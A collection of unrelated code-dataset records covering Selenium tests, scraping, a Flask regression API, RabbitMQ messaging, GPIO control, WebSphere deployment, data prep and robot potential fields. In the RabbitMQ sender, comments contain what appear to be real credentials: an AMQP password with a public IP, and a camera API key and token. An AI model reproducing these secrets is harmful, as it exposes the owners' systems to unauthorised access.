first call the parent method to mutate parameters\n        super().mutate_params(\n            get_best=get_best, time_tolerance=time_tolerance, accuracy=accuracy,\n            interpretability=interpretability,\n            imbalance_ratio=imbalance_ratio, train_shape=train_shape, ncol_effective=ncol_effective,\n            time_series=time_series, ensemble_level=ensemble_level,\n            score_f_name=score_f_name, **kwargs)\n        # Now we just need to tell LightGBM to use tweedie distribution\n        self.params[\"objective\"] = \"tweedie\"\n        self.params[\"tweedie_variance_power\"] = TweedieLightGBMModel._tweedie_variance_power\n","sub_path":"models/custom_loss/lightgbm_tweedie.py","file_name":"lightgbm_tweedie.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"218635183","text":"import os\nimport pytest\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nclass TestZy:\n\n    def setup(self):\n        browser=os.getenv(\"browser\", \"\").lower()\n        # Use Chrome by default\n        if browser==\"headless\":\n            self.driver = webdriver.PhantomJS()\n        elif browser==\"firefox\":\n            self.driver = webdriver.Firefox()\n        else:\n            self.driver=webdriver.Chrome()\n        # Could not be run from the command line\n        # self.driver = webdriver.Chrome()\n        # self.driver=webdriver.Firefox()\n        self.driver.get(\"https://testerhome.com/\")\n        self.driver.maximize_window()\n        self.driver.implicitly_wait(5)\n\n\n    def test_lx2(self):\n        self.driver.find_element(By.CSS_SELECTOR,'[title=\"MTSC2020 中国互联网测试开发大会议题征集\"]').click()\n        self.driver.find_element(By.CSS_SELECTOR,'[data-toggle=\"dropdown\"]').click()\n        element1=By.CSS_SELECTOR, '.list-container li:nth-child(4) a '\n        WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable(element1))\n        self.driver.find_element(*element1).click()\n\n    def test_shetuan(self):\n        self.driver.find_element(By.CSS_SELECTOR, \"#main-nav-menu li:nth-child(4)\").click()\n        element=By.CSS_SELECTOR, '[data-name=\"霍格沃兹测试学院\"]'\n        WebDriverWait(self.driver, 4).until(expected_conditions.element_to_be_clickable(element))\n        self.driver.find_element(*element).click()\n\n    def test_jinshuju(self):\n        self.driver.get(\"https://testerhome.com/topics/21495\")\n        element3=(By.CSS_SELECTOR, \".published-form__submit\")\n        self.driver.switch_to.frame(0)\n        # switch_to.frame switches into the embedded form frame\n        WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable(element3))\n        self.driver.find_element(By.CSS_SELECTOR, \".published-form__submit\").click()\n\n    def test_lianjie(self):\n        self.driver.get(\"https://testerhome.com/topics/21805\")\n        self.driver.find_element(By.PARTIAL_LINK_TEXT, \"第六届中国互联网测试开发大会\").click()\n        print(self.driver.window_handles)\n        # Print the window handles\n        self.driver.switch_to.window(self.driver.window_handles[1])\n        # Switch to the second window\n        self.driver.find_element(By.LINK_TEXT, '演讲申请').click()\n\n    def teardown_method(self):\n        sleep(5)\n        self.driver.quit()\n","sub_path":"test_selenium/test_zuoye.py","file_name":"test_zuoye.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"604747406","text":"import sys\n\nimport webbrowser\nimport random\n\nimport time\n\nif __name__ == '__main__':\n\n\twith open('regulars.txt', 'r') as f:\n\t\tregular_list = f.read().split('\\n')\n\twith open('irregulars.txt', 'r') as f:\n\t\tirregular_list = f.read().split('\\n')\n\twith open('data.txt', 
'r') as f:\n\t\tdata_list = f.read().split('\\n')\n\t\n\tif(len(sys.argv) == 1):\n\t\tn_regulars = 1\n\t\tn_irregulars = 3\n\t\tn_data = 2\n\tif((len(sys.argv) == 2) or (len(sys.argv) == 3) or (len(sys.argv) > 4)):\n\t\tprint(\"Please include number of regular sources and number of irregular sources you would like to see.\")\n\t\tprint(\"For example, python main.py 2 4 will retrieve 2 regular and 4 irregular sources\")\n\t\tprint(\"Passing no arguments will use 1 regular and 3 irregular sources\")\n\tif(len(sys.argv) == 4):\n\t\tn_regulars = int(sys.argv[1])\n\t\tn_irregulars = int(sys.argv[2])\n\t\tn_data = int(sys.argv[3])\n\n\tregular_open_list = random.sample(regular_list, n_regulars)\n\tirregular_open_list = random.sample(irregular_list, n_irregulars)\n\tdata_open_list = random.sample(data_list, n_data)\n\n\tfor regular in regular_open_list:\n\t\twebbrowser.open_new(regular)\n\ttime.sleep(0.1)\n\tfor irregular in irregular_open_list:\n\t\twebbrowser.open_new_tab(irregular)\n\ttime.sleep(0.1)\n\tfor data in data_open_list:\n\t\twebbrowser.open_new_tab(data)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"431940206","text":"import requests\nfrom parsel import Selector\nimport csv\nimport traceback\n\n\nclass Parser:\n    def __init__(self):\n        self.base_url = \"https://trade-example.com/\"\n        self.r = requests.Session()\n        self.headers = {\n            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) ' +\n                          'Chrome/86.0.4240.183 Safari/537.36'\n        }\n\n    def get_stocks(self):\n        portlist = []\n        page = self.get(self.base_url)\n        trs = Selector(page.text).css('tr').getall()\n\n        for tr in trs:\n            symbol_match = Selector(tr).css('td:nth-child(2) div span::text')\n            rating_match = Selector(tr).css('td:nth-child(6) div div').re(r'(\\d+)%')\n            if len(symbol_match) == 1 and len(rating_match) == 1:\n                symbol = symbol_match.getall()[0]\n                rating = rating_match[0]\n                if int(rating_match[0]) >= 80:\n                    print(symbol, rating)\n                    portlist.append([symbol])\n\n        file = open('result.csv', 'w')\n        with file:\n            writer = csv.writer(file)\n            writer.writerow(['portlist'])\n            writer.writerows(portlist)\n\n    def get(self, url):\n        page = self.r.get(url, headers=self.headers)\n        if page.status_code != 200:\n            print(page.status_code, url)\n            exit(1)\n\n        return page\n\n\nif __name__ == '__main__':\n    result = {'result': True}\n\n    try:\n        parser = Parser()\n\n        parser.get_stocks()\n\n    except KeyError:\n        f = open(\"error.txt\", \"w\")\n        f.write(traceback.format_exc())\n        f.close()\n    except Exception:\n        raise\n","sub_path":"trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"306009341","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 7 11:31:36 2020\n\n@author: Zsombi\n\"\"\"\n\nimport flask\nfrom flask import request, jsonify\nimport pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nimport json\n\nclass NumpyEncoder(json.JSONEncoder):\n    def default(self, obj):\n        if isinstance(obj, np.ndarray):\n            return obj.tolist()\n        return json.JSONEncoder.default(self, obj)\n\ndef runHeuristics(data):\n    x = data[['volume','fragility_rate','hazard_classification','isCooled']]\n    y = data['cost']\n    \n    reg = LinearRegression()\n    reg.fit(x,y)\n    \n    return {\n        \"intercept\": reg.intercept_,\n        \"coefArr\": reg.coef_\n    }\n\napp = 
flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n\n@app.route('/', methods=['POST'])\ndef home():\n data = request.get_json();\n dfItem = pd.DataFrame.from_records(data)\n json_response = json.dumps(runHeuristics(dfItem), cls=NumpyEncoder)\n return json_response\n\napp.run(debug=False)","sub_path":"Heuristics/generator/modules/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"485331729","text":"from getinput import get_input\nfrom pairs import dist_L1, Direction, add_pair, diag_adjacents\nimport itertools\nimport unittest\n\n\ndef get_coords(idx):\n n = 1\n while True:\n if n**2 > idx:\n break\n n += 2\n diff = n**2 - idx\n k = (n - 1) // 2\n # South side\n if (diff // (n-1)) == 0:\n return k - diff, -k\n # West side\n elif (diff // (n-1)) == 1:\n return -k, -k + (diff - (n-1))\n # North side\n elif (diff // (n-1)) == 2:\n return -k + (diff - 2*(n-1)), k\n # East side\n elif (diff // (n-1)) == 3:\n return k, k - (diff - 3*(n-1))\n\n\ndef sum_adjacent(loc, spiral):\n total = 0\n for offset in diag_adjacents:\n neighbor = add_pair(loc, offset)\n if neighbor in spiral:\n total += spiral[neighbor]\n return total\n\n\ndef part_1(square):\n return dist_L1((0, 0), get_coords(square))\n\n\ndef get_first_higher_than(square):\n depth = 1\n spiral = {(0, 0): 1}\n while True:\n # Go up\n for y in range(-depth+1, depth+1):\n val = sum_adjacent((depth, y), spiral)\n if val > square:\n return val, spiral\n spiral[(depth, y)] = val\n # Go left\n for x in range(depth-1, -(depth+1), -1):\n val = sum_adjacent((x, depth), spiral)\n if val > square:\n return val, spiral\n spiral[(x, depth)] = val\n # Go down\n for y in range(depth-1, -(depth+1), -1):\n val = sum_adjacent((-depth, y), spiral)\n if val > square:\n return val, spiral\n spiral[(-depth, y)] = val\n # Go right\n for x in range(-depth+1, depth+1):\n val = sum_adjacent((x, -depth), spiral)\n if val > square:\n return val, spiral\n spiral[(x, -depth)] = val\n depth += 1\n\n\ndef part_2(square):\n return get_first_higher_than(square)[0]\n\n\ndef main():\n input_str = int(get_input(3))\n print('Part 1:', part_1(input_str))\n print('Part 2:', part_2(input_str))\n\n\nclass TestSpiral(unittest.TestCase):\n def test_get_coords(self):\n self.assertEqual((1, 1), (get_coords(3)))\n self.assertEqual((-1, 2), get_coords(16))\n self.assertEqual((-2, -2), get_coords(21))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2017/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"27783651","text":"#!/usr/bin/env python\nimport pika\nimport json\nfrom time import sleep\nimport sys\n\n# ./ezviz records get 1 2019-05-30\\ 00:00:00 2019-05-30\\ 09:00:00 C90674290 WGXWZT a287e05ace374c3587e051db8cd4be82 at.bg2xm8xf03z5ygp01y84xxmv36z54txj-4n5jmc9bua-0iw2lll-qavzt882f\nparameters = pika.URLParameters(\"amqp://guest:guest@192.168.1.102\") #amqp://ilabservice:iLabServiceOps123456@40.73.40.246:5672/\nconnection = pika.BlockingConnection(parameters)\nchanPlay = connection.channel()\nchanPlay.exchange_declare(exchange=\"ezviz.exchange.rtplay\", exchange_type=\"direct\")\n\n# args = {\"x-max-priority\": 10}\n# args[\"x-expires\"] = 10 * 1000\nchanPlay.queue_declare(queue='ezviz.work.queue.rtplay', durable=False)\n\nchanPlay.queue_bind(exchange=\"ezviz.exchange.rtplay\",\n queue='ezviz.work.queue.rtplay', 
routing_key='rtplay')\n\nchanStop = connection.channel()\nchanStop.exchange_declare(exchange=\"ezviz.exchange.rtplay\", exchange_type=\"direct\")\n\n# args = {\"x-max-priority\": 10}\n# args[\"x-expires\"] = 10 * 1000\nchanStop.queue_declare(queue='ezviz.work.queue.rtstop_', durable=False)\n\nchanStop.queue_bind(exchange=\"ezviz.exchange.rtplay\",\n queue='ezviz.work.queue.rtstop_', routing_key='rtstop_')\n\nbody = {}\nbody[\"cmd\"] = \"rtstop\"\nbody[\"chanId\"] = 1\nbody[\"devSn\"] = \"C90843626\" #\"C90842467\" #\"C90842444\" #\"C90843626\" #\"C90842444\" #\"C90843484\"\nbody[\"devCode\"] = \"bcd\"\nbody[\"uuid\"] = \"abcd\"\nbody[\"quality\"] = 0\n\n\nbody[\"devSn\"] = sys.argv[1]\n\nif sys.argv[2] == \"rtplay\":\n body[\"cmd\"] = \"rtplay_continue\"\n body[\"duration\"] = 30*60\n chanPlay.basic_publish(exchange='ezviz.exchange.rtplay', routing_key='rtplay', body= json.dumps(body))\nelse:\n body[\"cmd\"] = \"rtstop\"\n chanStop.basic_publish(exchange='ezviz.exchange.rtplay', routing_key='rtstop_', body= json.dumps(body))\n\n\n\nprint(\" [x] Sent \" + json.dumps(body))\nconnection.close()\n","sub_path":"scripts/sender_local.py","file_name":"sender_local.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"574293558","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/cer/Project/pycharm/paper_manager/paper_manager/repository.py\n# Compiled at: 2018-04-14 05:20:12\n\n\nclass Repository:\n\n def __init__(self, name, path, support_suffix=None):\n \"\"\"\n :param name: name of the repository\n :param path: absolute path of the repository\n :param support_suffix: support suffix of this repository\n \"\"\"\n self.name = name\n self.path = path\n if support_suffix is None:\n self.support_suffix = [\n 'pdf']\n else:\n self.support_suffix = support_suffix\n return","sub_path":"pycfiles/paper_manager-2.0-py2.7/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"232643638","text":"a = int(input(\"请输入数字:\"))\n\nb = 0# 偶数和\nc = 0# 奇数和\ni = 0\nwhile i < a:\n\tprint(\"当前数字:%d\"%i)\n\ti+=1\n\tif i % 2 == 0:\n\t\tb = b + i\n\telif i % 2 != 0:\n\t\tc = c + i\n\nprint(\"偶数和为:%d\"%b)\nprint(\"奇数和为:%d\"%c)\nprint(\"总和为%d\"%(b+c))\n","sub_path":"08day/6-奇偶数分别求和.py","file_name":"6-奇偶数分别求和.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"507967288","text":"import matplotlib.pyplot as plt\n\nf=open('Back_Die_Away.csv','r')\ndata=f.readlines()\nf.close()\ntime=[]\ncounts=[]\n\nfor i in range(75,len(data)):\n line=data[i].split(sep=',')\n if float(line[0])<20000:\n counts.append(float(line[0]))\n time.append(float(line[1].split(sep='\\n')[0]))\nplt.plot(time,counts)\nplt.xlabel('Time(s)')\nplt.ylabel('Count rate (cps)')\nplt.savefig('Back.png',dpi=600)\nplt.show()\n\n","sub_path":"Back_Plot.py","file_name":"Back_Plot.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"95773667","text":"import json\nimport os\n\nfrom autobahn.asyncio.wamp import ApplicationSession\nimport inotify.adapters\nfrom inotify.constants import IN_CLOSE_WRITE\n\nfrom pigpio.backend.controller 
import gpio\n\nDIR_CONTROLLER = '/sys/class/gpio'\nDIR_PIN = os.path.join(DIR_CONTROLLER, 'gpio{}')\nBCM_PINS = [4, 5, 6, 12, 13, 16, 17, 19, 20, 21, 22, 23, 24, 25, 26, 27]\nPINS_PATH = [DIR_PIN.format(pin).encode() for pin in BCM_PINS]\n\n\nclass GPIOPinServer(ApplicationSession):\n def __init__(self, config=None):\n self.event_notifier = inotify.adapters.Inotify()\n for path in PINS_PATH:\n if os.path.exists(path):\n self._setup_initial_state(path)\n self.event_notifier.add_watch(path, mask=IN_CLOSE_WRITE)\n super().__init__(config)\n\n @staticmethod\n def _setup_initial_state(path):\n decoded_path = path.decode()\n with open(os.path.join(decoded_path, 'direction'), 'w') as f:\n f.write('out')\n with open(os.path.join(decoded_path, 'value'), 'w') as f:\n f.write('1')\n\n @staticmethod\n def process_event_and_get_data(event):\n gpio_path = event[2].decode()\n changed_file = event[3].decode()\n with open(os.path.join(gpio_path, changed_file), 'r') as f:\n value = f.read().strip()\n data = {\n 'pin': int(gpio_path.split('/')[-1].replace('gpio', '')),\n 'file': changed_file,\n 'value': value\n }\n return json.dumps(data)\n\n def publish_gpio_events(self):\n import threading\n threading.Thread(target=self._publish_gpio_events).start()\n\n def _publish_gpio_events(self):\n for event in self.event_notifier.event_gen():\n if event:\n self.publish(\n u'pigpio.gpio_update',\n self.process_event_and_get_data(event)\n )\n\n @staticmethod\n def _get_state(*args, **kwargs):\n state = gpio.get_state(*args, **kwargs)\n return json.dumps({'state': state})\n\n async def onJoin(self, details):\n await self.register(gpio.set_state, u'pigpio.set_state')\n await self.register(self._get_state, u'pigpio.get_state')\n self.publish_gpio_events()\n","sub_path":"pigpio/server/gpio_pin_server.py","file_name":"gpio_pin_server.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"413907089","text":"import unyt as u\nimport numpy as np\nimport pandas as pd\n\nfrom mosdef_cassandra.analysis import ThermoProps\n\n\ndef main():\n\n # Systems simulated\n pore_area = 2 * 22.104 * 21.270 * u.angstrom**2 # From .inp file\n pore_sizes = [1.0, 1.5, 2.0] * u.nm\n n_ion_pairs = [0, 4, 8]\n\n # Output\n nmols_list = []\n pore_sizes_list = []\n n_ion_pair_list = []\n\n for pore_size in pore_sizes:\n for n_ion_pair in n_ion_pairs:\n thermo_path = f\"../gcmc_pore/{pore_size.to_value('nm')}nm_{n_ion_pair}pairs/gcmc.out.prp\"\n thermo = ThermoProps(thermo_path)\n nmols_list.append(thermo.prop(\"Nmols_4\", start=20000000).mean())\n pore_sizes_list.append(pore_size)\n n_ion_pair_list.append(n_ion_pair)\n\n df = pd.DataFrame(\n columns=[\"pore_size_nm\", \"n_ion_pairs\", \"nmols\", \"nmols_per_nm^2\"]\n )\n df[\"pore_size_nm\"] = np.array(pore_sizes_list)\n df[\"n_ion_pairs\"] = np.array(n_ion_pair_list)\n df[\"nmols\"] = np.array(nmols_list)\n df[\"nmols_per_nm^2\"] = np.array(nmols_list) / pore_area.to_value(u.nm**2)\n df.to_csv(\"results_gcmc_pore.csv\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"mc_examples/realistic_workflows/graphene_slitpore/analysis/analyze_gcmc_pore.py","file_name":"analyze_gcmc_pore.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"61458989","text":"''' \n Licensed Materials - Property of IBM\n 5725-B69 5655-Y17 5655-Y31\n Copyright IBM Corp. 1987, 2014. All Rights Reserved.\n \n Note to U.S. 
Government Users Restricted Rights: \n Use, duplication or disclosure restricted by GSA ADP Schedule \n Contract with IBM Corp.\n'''\nimport Application\nimport Common\n\nglobal AdminApp\nglobal AdminConfig\nglobal AdminControl\n\n\nclass RTS(Application.Application):\n \n def __init__(self, cellName, nodeName, serverName, applicationName):\n Application.Application.__init__(self, cellName, nodeName, serverName, applicationName)\n #endDef \n \n \n #endDef\n \n def install(self, modulePath):\n modtovh1 = [\"teamserver\", 'teamserver.war,WEB-INF/web.xml', 'default_host']\n modtovh2 = [\"decisioncenter\", 'decisioncenter.war,WEB-INF/web.xml', 'default_host']\n modtovh = [modtovh1,modtovh2]\n\n rolesToUserMap = [\n [\"rtsUser\", \"No\", \"No\", \"\", \"rtsUser\"],\n [\"rtsAdministrator\", \"No\", \"No\", \"\", \"rtsAdministrator\"],\n [\"rtsConfigManager\", \"No\", \"No\", \"\", \"rtsConfigManager\"],\n [\"rtsInstaller\", \"No\", \"No\", \"\", \"rtsInstaller\"],\n [\"administrator\", \"No\", \"No\", \"\", \"administrator\"],\n [\"testedGroup\", \"No\", \"No\", \"\", \"testedGroup\"],\n [\"definedGroup\", \"No\", \"No\", \"\", \"definedGroup\"],\n [\"newGroup\", \"No\", \"No\", \"\", \"newGroup\"],\n [\"author\", \"No\", \"No\", \"\", \"author\"],\n [\"refusedGroup\", \"No\", \"No\", \"\", \"refusedGroup\"],\n [\"reviewedGroup\", \"No\", \"No\", \"\", \"reviewedGroup\"],\n [\"reviewer\", \"No\", \"No\", \"\", \"reviewer\"],\n [\"deprecatedGroup\", \"No\", \"No\", \"\", \"deprecatedGroup\"],\n [\"tester\", \"No\", \"No\", \"\", \"tester\"],\n [\"rmtUserGroup\", \"No\", \"No\", \"\", \"rmtUserGroup\"],\n [\"inactiveGroup\", \"No\", \"No\", \"\", \"inactiveGroup\"],\n [\"Validator\", \"No\", \"No\", \"\", \"Validator\"],\n [\"Eligibility\", \"No\", \"No\", \"\", \"Eligibility\"],\n [\"deployer\", \"No\", \"No\", \"\", \"deployer\"],\n [\"deployedGroup\", \"No\", \"No\", \"\", \"deployedGroup\"]\n ]\n\n mapref7 = [\"teamserver\", \"\", \"teamserver.war,WEB-INF/web.xml\", \"jdbc/serverextendedbrm\", \"javax.sql.DataSource\", \"jdbc/serverextendedbrm\"]\n mapref8 = [\"teamserver\", \"\", \"teamserver.war,WEB-INF/web.xml\", \"jdbc/serverworkflow\", \"javax.sql.DataSource\", \"jdbc/serverworkflow\"]\n mapref = [mapref7, mapref8]\n\n\n attrs = ['-MapWebModToVH', modtovh, '-MapResRefToEJB', mapref, '-cell', self.cellName, '-node', self.nodeName, '-server', self.serverName,\n '-appname', self.applicationName, '-MapRolesToUsers' , rolesToUserMap ]\n\n AdminApp.install(modulePath, attrs)\n Common.isolateClassLoader(self.applicationName)\n Common.setCookiePath(self.applicationName, '/teamserver')\n\n # Defect 60186: In Enterprise Applications > teamserver-WAS85 > Manage Modules > decisioncenter.war > Session management,\n # In General Properties, check \"Override session management\" and uncheck \"Security integration\"\n deployments = AdminConfig.getid('/Deployment:teamserver-WAS85')\n appDeploy = AdminConfig.showAttribute(deployments, 'deployedObject')\n mod1 = AdminConfig.showAttribute(appDeploy, 'modules')\n\n kuki = ['maximumAge', 1000]\n cookie = [kuki]\n cookieSettings = ['defaultCookieSettings', cookie]\n tuningParmsDetailList = [[\"allowOverflow\", \"true\"], [\"invalidationTimeout\", \"30\"], [\"maxInMemorySessionCount\", \"1000\"]]\n tuningParamsList = ['tuningParams', tuningParmsDetailList]\n sessionManagerDetailList = [[\"enableSecurityIntegration\", \"false\"], [\"maxWaitTime\", \"0\"], [\"allowSerializedSessionAccess\", \"false\"], [\"enableProtocolSwitchRewriting\", \"false\"] 
,[\"enableUrlRewriting\", \"false\"], [\"enable\", \"true\"], [\"accessSessionOnTimeout\", \"true\"], [\"enableSSLTracking\", \"false\"], [\"enableCookies\", \"true\"], tuningParamsList, cookieSettings]\n sessionMgr = ['sessionManagement', sessionManagerDetailList]\n id = AdminConfig.create('ApplicationConfig', appDeploy,[sessionMgr], 'configs')\n targetMappings = AdminConfig.showAttribute(appDeploy, 'targetMappings')\n targetMappings = targetMappings[1:len(targetMappings)-1]\n attrs = ['config', id]\n AdminConfig.modify(targetMappings,[attrs])\n\n nameAttr = ['name', 'myWebModuleConfig']\n descAttr = ['description', \"Web Module config post create\"]\n webAttrs = [nameAttr, descAttr, sessionMgr]\n\n arrayModules = mod1[1:len(mod1)-1].split(\" \")\n for module in arrayModules:\n if module.find('WebModuleDeployment') != -1:\n moduleConfig = AdminConfig.create('WebModuleConfig', module, webAttrs)\n attrs = ['config', moduleConfig]\n targetMappings = AdminConfig.showAttribute(appDeploy, 'targetMappings')\n targetMappings = targetMappings[1:len(targetMappings)-1].split(\" \")\n for target in targetMappings:\n if target.find('DeploymentTargetMapping') != -1:\n attrs = ['config', moduleConfig]\n AdminConfig.modify(target,[attrs])\n\n # EndDef\n","sub_path":"Personalization/jython/RTS.py","file_name":"RTS.py","file_ext":"py","file_size_in_byte":5595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"585311159","text":"df_dropped = df.copy()\ndf_dropped.dropna(inplace = True)\n\ndef sparse(df_series, sparse_value, lt = None, gt = None, eq = None):\n counts = df_series.value_counts()\n if eq != None:\n idx = counts[counts.eq(eq)].index\n df_series.loc[df_series.isin(idx)] = f'sparse{sparse_value}'\n return df_series\n elif lt != None and gt == None:\n idx = counts[counts.lt(lt)].index\n df_series.loc[df_series.isin(idx)] = f'sparse{sparse_value}'\n return df_series\n elif lt == None and gt != None:\n idx = counts[counts.gt(gt)].index\n df_series.loc[df_series.isin(idx)] = f'sparse{sparse_value}'\n return df_series\n elif lt != None and gt != None:\n idx = counts[counts.lt(lt) & counts.gt(gt)].index\n df_series.loc[df_series.isin(idx)] = f'sparse{sparse_value}'\n return df_series\n else:\n print('To recategorize sparse categories, define arguments for lt, gt, or eq.')\n\ndf_dropped['len_listing'] = df_dropped['name'].map(lambda x: len(x))\n\ndf_dropped['year_review_last'] = df_dropped.last_review.map(lambda x: x.split('-')[0])\ndf_dropped['year_review_fix'] = sparse(df_dropped.year_review_last, 1, lt = 26)\ndf_dropped['year_review_fix'] = df_dropped['year_review_fix'].astype(str)\n\ndf_dropped = df_dropped[df_dropped.price != 0]\ndf_price_limit = df_dropped.loc[df_dropped['price'] < 1500]\ndf_price_limit['lprice'] = np.log(df_price_limit.price)\n\ndef binning(i):\n if i > 7 and i < 15:\n return '2wks'\n elif i > 14 and i < 22:\n return '3wks'\n elif i > 21 and i < 32:\n return '1month'\n elif i > 31:\n return 'more_than_month'\n else:\n return i\n\ndf_price_limit['min_night_bins'] = df_price_limit.minimum_nights.apply(binning)\ndf_price_limit.min_night_bins = df_price_limit.min_night_bins.astype(str)\n\ndf_mod = df_price_limit.drop(['price', 'id', 'name', 'host_id', 'host_name', \n 'neighbourhood', 'latitude', 'longitude', 'last_review', 'year_review_last'], axis = 1)\n\nX = df_mod.drop('lprice', axis = 1)\ny = 
df_mod.lprice\n","sub_path":"Python_files/data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"641541883","text":"import numpy\nimport math\nfrom objects.AbstractBase import AbstractShape\nfrom objects.MobileRobot import MobileRobot\nfrom resources.GlobalSharedData import GlobalSharedData as gShare\n\n\nclass TargetPoint(AbstractShape):\n    \"\"\"\n    Class of the target point the robot is heading toward\n    \"\"\"\n\n    def __init__(self, sharedData: gShare, position_x, position_y):\n        \"\"\"\n        TargetPoint class constructor\n        :param sharedData: Class holding the shared data\n        :param position_x: Horizontal position of the target point\n        :param position_y: Vertical position of the target point\n        \"\"\"\n        self.sharedData = sharedData\n        self.position_x = position_x\n        self.position_y = position_y\n        self.radius = self.sharedData.targetPointDrawingSize\n\n    def attach_to_canvas(self, canvas: type) -> None:\n        self.canvas = canvas\n        self.objectId = canvas.create_oval(\n            self.position_x - self.radius,\n            self.position_y - self.radius,\n            self.position_x + self.radius,\n            self.position_y + self.radius,\n            fill=self.sharedData.targetPointColor\n        )\n        self.backgroundImageArray = numpy.zeros((2 * self.sharedData.canvasHeight, 2 * self.sharedData.canvasWidth))\n        self.createFieldImage()\n\n    def move(self) -> None:\n        # The target position is assumed not to move\n        return\n\n    def generateField(self, x: float, y: float) -> float:\n        distance = {self.sharedData.potentialFieldChoices[0]: self.conicalPotentialField(x, y),\n                    self.sharedData.potentialFieldChoices[1]: self.parabolicPotentialField(x, y),\n                    self.sharedData.potentialFieldChoices[2]: self.harmonicPotentialField(x, y),\n                    \"Wybierz metodę wyznaczania pola potencjalnego\": 0  # GUI placeholder (\"Choose the potential field method\"); kept verbatim to match the widget value\n                    }[self.sharedData.potentialField.get()]\n        return distance\n\n    def createFieldImage(self) -> None:\n        for xIndex in range(2 * self.sharedData.canvasWidth):\n            for yIndex in range(2 * self.sharedData.canvasHeight):\n                self.backgroundImageArray[yIndex, xIndex] = self.generateField(\n                    xIndex - self.sharedData.canvasWidth + self.position_x,\n                    yIndex - self.sharedData.canvasHeight + self.position_y\n                )\n\n    def conicalPotentialField(self, x: float, y: float) -> float:\n        \"\"\"\n        Computes the value of the conical potential field at the chosen point\n        :param x: x coordinate\n        :param y: y coordinate\n        :return: Potential field value\n        \"\"\"\n        distance = math.sqrt((x - self.position_x) ** 2 + (y - self.position_y) ** 2)\n        return self.sharedData.targetPointPotentialMultiplayer * distance\n\n    def parabolicPotentialField(self, x: float, y: float) -> float:\n        \"\"\"\n        Computes the value of the parabolic potential field at the chosen point\n        :param x: x coordinate\n        :param y: y coordinate\n        :return: Potential field value\n        \"\"\"\n        distance = math.sqrt((x - self.position_x) ** 2 + (y - self.position_y) ** 2)\n        return (distance**2) * self.sharedData.targetPointPotentialMultiplayer / 2\n    \n    def harmonicPotentialField(self, x: float, y: float) -> float:\n        \"\"\"\n        Computes the value of the harmonic potential field (including the uniform flow) at the chosen point\n        :param x: x coordinate\n        :param y: y coordinate\n        :return: Harmonic field value\n        \"\"\"\n        startX = 0\n        startY = 0\n\n        for objectInArray in self.sharedData.objectsArray:\n            if isinstance(objectInArray, MobileRobot):\n                startX = objectInArray.position_x\n                startY = 
objectInArray.position_y\n\n        distance = math.sqrt((x - self.position_x) ** 2 + (y - self.position_y) ** 2)\n\n        distance = distance + 0.1\n\n        alfa = math.atan2((self.position_y - y), (self.position_x - x))\n\n        if self.sharedData.enableUniformFlowFlag:\n            return self.sharedData.targetPointPotentialMultiplayer*(math.log(distance)) -((x - startX)*math.cos(alfa)+(y - startY)*math.sin(alfa))\n        else:\n            return self.sharedData.targetPointPotentialMultiplayer*(math.log(distance))\n\n    def checkUpdateTargetPoint(self) -> None:\n        \"\"\"\n        FIX - links the object's position to the shared data structure\n        :return: None\n        \"\"\"\n        if self.position_y != self.sharedData.targetPointY or self.position_x != self.sharedData.targetPointX:\n            self.position_x = self.sharedData.targetPointX\n            self.position_y = self.sharedData.targetPointY\n            self.canvas.coords(\n                self.objectId,\n                self.position_x - self.radius,\n                self.position_y - self.radius,\n                self.position_x + self.radius,\n                self.position_y + self.radius,\n            )\n","sub_path":"objects/TargetPoint.py","file_name":"TargetPoint.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 